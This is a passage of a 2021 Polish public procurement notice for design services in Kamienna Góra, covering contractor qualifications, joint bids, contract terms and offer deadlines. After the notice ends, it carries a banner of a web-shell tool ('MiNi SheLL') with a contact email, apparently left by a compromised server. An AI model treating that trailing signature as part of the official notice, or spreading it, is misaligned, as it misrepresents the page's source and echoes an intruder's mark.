budowlane do projektowania bez ograniczeń w specjalności drogowej oraz będącą członkiem właściwej terytorialnie Izby Inżynierów Budownictwa;b)	Dysponuje co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci kanalizacyjnych i wodociągowych oraz będącą członkiem właściwej terytorialnie Izby Inżynierów Budownictwa;c)	Dysponuje do najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz będącą członkiem właściwej terytorialnie Izby Inżynierów Budownictwa.Osoby odpowiedzialne za kierowanie robotami budowlanymi muszą posiadać uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie odpowiadające wymaganiom określonym w ustawie – Prawo budowlane (Dz. U. z 2019 r., poz. 1186 z późn. zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające wymaganiom określonym w ustawie o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r., poz. 1117 z późn. zm.). W przypadku uprawnień budowlanych wydanych na podstawie wcześniej obowiązujących przepisów – uprawnienia muszą obejmować zakres zamówienia.W przypadku, gdy Wykonawca wykazuje osoby, które nabyły kwalifikacje wymagane do wykonywania działalności w budownictwie poza terytorium RP, osoby te muszą posiadać decyzje o uznaniu kwalifikacji zawodowych w danej branży budowlanej zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jednolity Dz. U. z 2018 r., poz. 2272) lub posiadać prawo do świadczenia usług transgranicznych zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r., poz. 1117 z późn. zm.) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniu Wykonawcy o braku podstawwykluczenia i spełnianiu warunków udziału w postępowaniu, w zakresie podstaw wykluczenia zpostępowania wskazanych przez Zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W przypadkuwspólnego ubiegania się o udzielenie zamówienia: 1. Wykonawcy są zobowiązani doustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowaniaich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwonależy załączyć do oferty. 2. Wszelka korespondencja będzie prowadzona wyłącznie zpełnomocnikiem. 3. Warunek dotyczący uprawnień do prowadzenia określonej działalnościgospodarczej lub zawodowej zostanie spełniony, jeżeli co najmniej jeden z wykonawcówwspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzeniaokreślonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji teuprawnienia są wymagane. 4. W odniesieniu do warunków dotyczących wykształcenia,kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzieleniezamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, dorealizacji których te zdolności są wymagane. 5. W przypadku, o którym mowa w ust. 3 i 4,wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do ofertyoświadczenie, z którego wynikać będzie, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. 6. Każdy z Wykonawców wspólnie ubiegających się o udzieleniezamówienia musi złożyć oświadczenie o o braku podstaw wykluczenia i spełnianiu warunkówudziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia określone zostały w projektowanych postanowieniach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/kamiennagora w zakładce dedykowanej postępowaniu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-06 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-02</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-23 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com